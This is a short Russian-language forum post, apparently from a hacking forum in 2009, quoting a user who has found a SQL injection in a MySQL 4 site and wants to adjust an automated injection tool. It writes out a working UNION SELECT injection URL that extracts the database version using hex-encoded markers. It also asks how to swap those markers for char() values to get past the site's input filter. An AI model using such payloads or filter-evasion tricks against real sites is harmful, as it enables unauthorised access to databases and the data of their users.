18.11.2009, 14:22
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
С нами:
9347610
Репутация:
165
|
|
Сообщение от Byrger
Есть sql-inj версия БД MySQL 4
Так как 4 пришлось работать сиптом но сипт для поиска версии использует данный запрос:
PHP код:
http://site.com/info.php?id=6590999+UNION+SELECT+1,2,3,4,CONCAT(0x7873716C696E6A626567696E,Version(),0x7873716C696E6A656E64),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
Проблема в том что сайт не пропускает его x7873716C696E6A626567696E хотя 0x3A проходит в ручную норм
Можно как-то в СИПТ исправить разделители? char(120,115,113,108,105,110,106,98,101,103,105,11 0)
|
|
|